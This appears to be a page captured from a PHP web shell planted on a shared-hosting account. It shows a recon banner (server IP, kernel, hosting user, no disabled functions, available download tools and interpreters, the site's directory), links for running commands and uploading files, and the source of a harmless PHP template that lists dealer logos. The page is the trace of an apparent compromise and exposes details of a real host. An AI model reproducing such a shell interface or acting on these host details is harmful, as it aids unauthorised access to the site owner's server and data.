Server IP : 103.53.40.154 / Your IP : 18.226.104.30 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/ppcad7no/parthaquafresh.com/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php $brand_sql=db_query("select * from tbl_clients order by image_id asc"); if(mysqli_num_rows($brand_sql)>0) { ?> <div class="related-products"> <div class="container"> <div class="section-title"> <h2>Authorised Dealer</h2> </div> <div class="products-slides owl-carousel owl-theme"> <?php while($brand_res=mysqli_fetch_array($brand_sql)) { ?> <div class="single-products-box client-logo"> <div class="image"> <a href="javascript:void(0)" class="d-block"><img src="<?=$site_url?>/our_client/<?=$brand_res['image_name']?>" alt="image"></a> </div> </div> <?}?> </div> </div> </div> <?}?>